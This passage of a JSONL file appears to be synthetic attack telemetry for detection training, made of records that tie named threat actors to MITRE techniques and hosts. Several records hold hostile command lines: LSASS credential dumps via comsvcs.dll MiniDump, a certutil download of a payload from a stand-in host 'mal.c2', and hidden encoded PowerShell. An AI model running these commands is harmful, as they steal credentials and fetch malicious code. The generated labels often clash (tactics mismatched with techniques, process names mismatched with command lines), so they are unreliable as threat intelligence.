JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-10-11T03:44:45.000Z","user":{"name":"i-e9o8k45w1vcu","sid":"S-1-5-21-798009822-959238269-4798"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Discovery","Defense Evasion","Impact"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20260823T135715000Z_0016849","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.120.90.133","name":"AZURE-VM-FG56U5MFUU","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16849Scattered SpiderT1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.187.9.41","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-30T19:21:57.000Z","user":{"name":"CORP\\a2g4qs3zb15q","sid":"S-1-5-21-985316783-866433862-3522"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20250420T011206000Z_0016851","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.66.165.172","name":"APP-WEB-1RWDQ21O0E","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16851UNC4841T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.95.249.56","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2531 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-27T21:39:06.000Z","user":{"name":"CORP\\ffvc8n2b16hv","sid":"S-1-5-21-972907552-681187203-3366"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Lateral Movement","Privilege Escalation"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20260525T171026000Z_0016853","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.243.122.55","name":"IAM-ROLE-BK7VXKELBD","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16853Scattered SpiderT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.72.4.118","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-09-30T17:39:15.000Z","user":{"name":"arn:aws:iam::bomn2k5opf7r","sid":"S-1-5-21-802399444-506958973-1515"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Initial Access"],"technique_id":"T1003.001"},"event_id":"evt_lapsus_20251120T053721000Z_0016855","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.144.234.98","name":"DB-ORACLE-P1ONMZVVM8","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16855Lapsus$T1003.001"},"network":{"domain":"github.com","dst_ip":"1.188.184.123","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-05-16T16:52:17.000Z","user":{"name":"i-6lue7nin776n","sid":"S-1-5-21-565081063-401703536-1091"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Exfiltration","Persistence","Collection"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20250605T184407000Z_0016857","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.42.194.96","name":"AZURE-VM-7PJ46UMY43","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16857Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.131.102.177","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-14T22:33:46.000Z","user":{"name":"azuread\\pgfaxkoutlbz","sid":"S-1-5-21-202864927-553013845-9543"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Collection"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20260319T115645000Z_0016859","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.15.103.156","name":"AZURE-VM-WYDRY4IGFS","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16859APT41T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.5.177.8","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-14T20:43:15.000Z","user":{"name":"i-1s0uf9y5909q","sid":"S-1-5-21-318296378-980843347-7727"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Privilege Escalation","Collection"],"technique_id":"T1003.001"},"event_id":"evt_apt41_20250812T005206000Z_0016861","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.92.77.11","name":"AZURE-VM-HPPJ5GS7OA","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16861APT41T1003.001"},"network":{"domain":"github.com","dst_ip":"1.54.210.242","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 750 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-08T00:09:12.000Z","user":{"name":"azuread\\nqm9fglc8w4v","sid":"S-1-5-21-549225682-255905962-7771"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20250628T013940000Z_0016863","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.236.158.13","name":"EC2-INST-MWBDR3PVYY","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16863APT29T1059.001"},"network":{"domain":"github.com","dst_ip":"1.92.207.191","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-03-26T06:45:34.000Z","user":{"name":"svc_88brebgqm3yb","sid":"S-1-5-21-220281348-235528127-4807"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery","Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20260205T130752000Z_0016865","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.172.6.78","name":"EC2-INST-I0X9NNQ7KZ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16865Scattered SpiderT1566.001"},"network":{"domain":"github.com","dst_ip":"1.162.66.88","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3994 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-22T05:50:30.000Z","user":{"name":"svc_sjea10mo3nas","sid":"S-1-5-21-703657976-815495833-4048"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20250307T042224000Z_0016867","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.170.178.36","name":"IAM-ROLE-2OZ5YRU2BX","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16867APT29T1021.006"},"network":{"domain":"github.com","dst_ip":"1.82.116.248","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-10-31T12:50:02.000Z","user":{"name":"azuread\\pi3xi6xq2kaf","sid":"S-1-5-21-806994738-219589109-1928"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Persistence","Discovery","Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20261001T143020000Z_0016869","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.85.111.49","name":"EC2-INST-2QL45K34W4","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16869APT29T1484.001"},"network":{"domain":"github.com","dst_ip":"1.74.183.8","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-05-17T11:30:04.000Z","user":{"name":"svc_dowj8sa11hp4","sid":"S-1-5-21-811081614-279167727-8559"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Command and Control","Credential Access","Collection"],"technique_id":"T1531"},"event_id":"evt_apt29_20250806T211706000Z_0016871","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.69.34.119","name":"AZURE-VM-KHUJ7H74BD","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16871APT29T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.71.35.16","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-02-26T00:25:29.000Z","user":{"name":"arn:aws:iam::0s38yd4pmt4c","sid":"S-1-5-21-941066211-826158409-5230"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Impact","Privilege Escalation","Execution"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20260428T042850000Z_0016873","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.242.212.118","name":"EC2-INST-YQ1Z7B3XUK","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16873Mustang PandaT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.90.161.218","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3207 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-16T08:44:58.000Z","user":{"name":"azuread\\osfs02dg99q2","sid":"S-1-5-21-312694191-350559141-5951"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact","Privilege Escalation"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20250102T075017000Z_0016875","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.203.62.193","name":"WIN-FIN-SRV-9DSVXTAZYI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16875Mustang PandaT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.122.142.109","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3631 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-11T18:14:00.000Z","user":{"name":"arn:aws:iam::a939ft2zm8cd","sid":"S-1-5-21-631955083-670053062-7716"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Exfiltration","Command and Control","Discovery"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20250713T141809000Z_0016877","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.222.255.5","name":"WIN-FIN-SRV-XOHLZU3WKZ","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16877APT29T1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.93.17.240","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 944 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-10-23T04:02:04.000Z","user":{"name":"i-djjzmdhp29wg","sid":"S-1-5-21-575083620-692981168-6813"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Discovery","Initial Access"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20260919T085307000Z_0016879","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.247.47.49","name":"WIN-FIN-SRV-2IG484ROEJ","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16879UNC4841T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.164.179.242","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-10-23T15:46:37.000Z","user":{"name":"arn:aws:iam::wjc26etnfk9f","sid":"S-1-5-21-206691368-934833350-8766"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1003.001 using cloud-native technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Initial Access","Lateral Movement"],"technique_id":"T1003.001"},"event_id":"evt_apt29_20260910T153436000Z_0016881","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.226.29.66","name":"APP-WEB-EENH4OHB98","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16881APT29T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.91.105.89","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2789 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-07-18T15:38:13.000Z","user":{"name":"CORP\\akabznt8pomg","sid":"S-1-5-21-428675487-681299711-8751"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Privilege Escalation","Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20261230T215818000Z_0016883","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.47.22.247","name":"APP-WEB-JV1TZJF4UE","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16883UNC4841T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.38.137.109","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-02T07:10:14.000Z","user":{"name":"arn:aws:iam::z9j9tvfyz3u7","sid":"S-1-5-21-611824265-130865454-5031"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Lateral Movement"],"technique_id":"T1531"},"event_id":"evt_lapsus_20250521T152933000Z_0016885","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.27.109.128","name":"WIN-FIN-SRV-89OQABN4N7","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16885Lapsus$T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.188.145.8","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-19T15:28:34.000Z","user":{"name":"arn:aws:iam::xcnoclptigrn","sid":"S-1-5-21-606801212-137997740-2977"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Persistence"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20260315T074217000Z_0016887","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.240.238.92","name":"AZURE-VM-RX6J94KY05","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16887FIN7T1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.7.204.201","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2197 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-21T07:08:01.000Z","user":{"name":"i-6e2qztj9eno0","sid":"S-1-5-21-854553830-781320352-4582"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20260110T023343000Z_0016889","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.68.67.157","name":"DB-ORACLE-UGGE3SN1Q4","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16889Volt TyphoonT1566.001"},"network":{"domain":"github.com","dst_ip":"1.91.45.223","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 993 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-11-22T11:08:27.000Z","user":{"name":"arn:aws:iam::h0hhmcngzlj0","sid":"S-1-5-21-927362968-297818469-4428"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Lateral Movement","Reconnaissance","Exfiltration"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20261119T203949000Z_0016891","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.81.199.61","name":"IAM-ROLE-EE2JN3068N","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16891FIN7T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.184.22.98","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-11-07T13:43:26.000Z","user":{"name":"CORP\\s7x8lhjxjmf6","sid":"S-1-5-21-214080457-686730202-9163"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Reconnaissance","Impact"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250628T162700000Z_0016893","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.86.147.229","name":"APP-WEB-396DZCRKA4","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"16893Lapsus$T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.124.21.109","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 754 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-30T22:52:42.000Z","user":{"name":"CORP\\2ywyduyead9k","sid":"S-1-5-21-409358344-845817212-8326"}}
